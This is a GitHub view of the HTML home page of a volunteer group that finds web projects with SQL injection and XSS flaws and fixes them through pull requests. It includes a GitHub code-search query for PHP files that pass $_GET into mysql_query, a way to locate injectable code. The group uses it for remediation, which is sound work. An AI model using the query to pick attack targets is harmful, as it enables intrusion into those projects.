-
Notifications
You must be signed in to change notification settings - Fork 1
/
index.html
117 lines (101 loc) · 4.28 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
<html>
<head>
<title>The Programmer Education Foundation</title>
<style type="text/css">
body {
width: 40em;
margin-left: auto;
margin-right: auto;
color: #222;
background-color: #ECFCC7;
font-family: 'Museo Sans', Tahoma, sans-serif;
font-size: 18px;
}
</style>
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
ga('create', 'UA-40861100-1', 'github.io');
ga('send', 'pageview');
</script>
</head>
<body>
<h1>The Programmer Education Foundation</h1>
<p>
Web developers are almost entirely self-taught; even if they attended
university for a computer science degree, it is almost certain they
never had a course teach them about XSS or SQL injection.
</p>
<p>
We aim to seek out developers who are unwittingly making fatal
mistakes, and educate them so they may continue on a path towards
being a great programmer.
</p>
<p>
Because examples are the best way to educate, our lessons take the
form of pull requests - it is only through the combined background
information and concrete example we may expect results.
</p>
<h2>Motivation</h2>
<p>
Every now and then someone <a
href="http://www.reddit.com/r/lolphp/comments/1e4foy/the_love_story_of_mysql_query_and_get_on_github/">points
out</a> that Github's code search can be used to find many extremely
vulnerable programs. The reaction is usually 95% "glad I'm not that
stupid" and 5% "look at me taking advantage of them".
</p>
<p>
As a community of professionals, we're better than that. We should
recognize that most errors come from ignorance, not lack of
intelligence, and attack the problem as such. Plus, being mean is
just not cool. Don't be a dick.
</p>
<h2>Rules</h2>
<ol>
<li>Be nice.</li>
<li>Be informative.</li>
<li>Don't duplicate others' work.</li>
</ol>
<h2>Problems</h2>
<h3>SQL Injection</h3>
<p>
Allowing user data to leak into your database queries unfiltered, so
an attacker can perform arbitrary commands on your database.
</p>
<p>
See <a href="http://bobby-tables.com/">bobby-tables.com</a> for more
information on how to avoid this in different languages.
</p>
<h4>Helpful Searches</h4>
<ul>
<li>(PHP): <a
href="https://github.com/search?p=1&q=extension%3Aphp+mysql_query+%24_GET&ref=searchresults&type=Code">$_GET
and mysql_query</a>
</ul>
<h3>XSS</h3>
<p>
A cross-site-scripting vulnerability allows an attacker to execute
arbitrary Javascript on your site when your users visit a particular
page. They can use this for a number of attacks; for instance,
sending off users' sessions to a remote server, where the attacker can
collect them and use them to log in as the user.
</p>
<h2>Contribute</h2>
<p>
Interested in helping? <a
href="https://github.com/programmer-education-foundation/volunteers/issues/new">Open
an issue</a> on the volunteers repository and we'll add you to the
organization. Please list any language-groups you'd like to be a part
of (e.g. PHP) if you'd like to get pinged periodically for advice.
</p>
<p>
Once you're a part of the organization, find a project with a problem
and fork it to PEF. Fix the problem, send in a pull request, and feel
good about yourself. See <a
href="https://github.com/d7my11/alwaleed/pull/1">our first pull
request</a> for an example of the type of thing we're looking for.
</p>
</body>
</html>